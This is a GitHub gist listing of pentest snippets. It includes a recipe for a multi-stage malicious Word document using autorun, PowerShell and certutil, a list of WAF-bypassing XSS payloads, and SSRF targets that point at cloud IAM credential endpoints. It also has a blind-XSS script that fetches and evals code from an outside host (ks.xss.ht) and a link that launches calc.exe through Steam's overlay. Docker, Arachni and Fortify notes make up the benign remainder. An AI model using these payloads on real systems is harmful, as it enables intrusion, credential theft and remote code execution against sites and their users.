Skip to content

Instantly share code, notes, and snippets.

View nani1337's full-sized avatar

nani1337

12 followers · 9 following
View GitHub Profile
@nani1337
nani1337 / muti-stage-1.md
Created January 15, 2019 14:05 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property
@nani1337
nani1337 / waf_xss_bypasses
Created September 15, 2018 21:40
java%0d%0ascript%0d%0a:alert(0)
(crlf injection to bypass javascript: being blacklisted)
<svg%0donload=prompt(1)>
(incase svg onload= is filtered, the %0d acts as a seperator and can sometimes confuse wafs.) %0a %0c %09 %00 are also common payloads to use here.
<input onfocus=alert(0) autofocus>
If a dev has hard-coded a blacklist to "protect" from XSS, input is sometimes forgotten about!
\\"-alert(0);//
@nani1337
nani1337 / cloud_metadata.txt
Created September 15, 2018 21:37 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@nani1337
nani1337 / recon-web
Created September 15, 2018 21:24
site: site.com inurl:&
Useful for finding endpoints with parameters.
site: site.com inurl:login,register,upload,logout,redirect,redir,goto,admin etc..
For finding interesting endpoints
site: site.com ext:php,asp,aspx,jsp,jspa,txt,swf
@nani1337
nani1337 / docker installation in kali
Created August 29, 2018 09:39
To install Docker in Kali, these were the steps I followed:
Create a backports file and add the entry for Debian Wheezy:
echo 'deb http://http.debian.net/debian wheezy-backports main' > /etc/apt/sources.list.d/backports.list && apt-get update
Install ca-certificates and allow APT to operate via https:
apt-get install apt-transport-https ca-certificates
@nani1337
nani1337 / archni
Created June 13, 2018 11:41
/root/Downloads/arachni-1.5.1-0.5.12/bin/arachni http://testfire.net/ --checks=xss* --output-verbose --report-save-path=/tmp/test.com.afr
jenkins
/root/Downloads/arachni-1.5.1-0.5.12/bin/arachni_reporter /tmp/test.com.afr --reporter=html:outfile=/tmp/my_report.html.zip
@nani1337
nani1337 / BXSs
Created May 29, 2018 04:54
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//ks.xss.ht");a.send();</script>
@nani1337
nani1337 / Fortify Simple commands
Last active August 19, 2023 13:16
Step#1 (clean cache)
>sourceanalyzer -b xvwa -clean
Step#2 (translate source code to byte code)
>sourceanalyzer -Xmx2500M -Xms2500M -64 -verbose -b xvwa -cp **/*.jar **/*.php
Step#3 (scan with rulepack, custom rules, filters, etc)
>>sourceanalyzer -b xvwa -scan -f wvwa.fpr
@nani1337
nani1337 / Image Recongised code.py
Last active May 15, 2018 11:50
#
#
from PIL import Image
import pytesseract
image = Image.open('2.jpg')
orange = pytesseract.image_to_string(image)
print orange
#Record the preparation process is very troublesome.
@nani1337
nani1337 / calc pop up in .html
Last active October 9, 2019 05:06
Calc in HTML5
<a href="calculator:">calculator:</a> (regular link)
<br /><br />
<input type="button" onclick="location.href = 'calculator:'" value="location.href = 'calculator:'" /> (button using location.href)
<br /><br />
<input type="button" onclick="setTimeout('location.href = \'calculator:\'')" value="setTimeout('location.href = \'calculator:\'')" /> (setTimeout/location.href, requires confirmation)
sm_testkick <a onmouseover="javascript:SteamOverlayAPI.OpenExternalBrowserURL('file://C:/Windows/System32/calc.exe')">The remote host stopped receiving communications and closed the connection</a>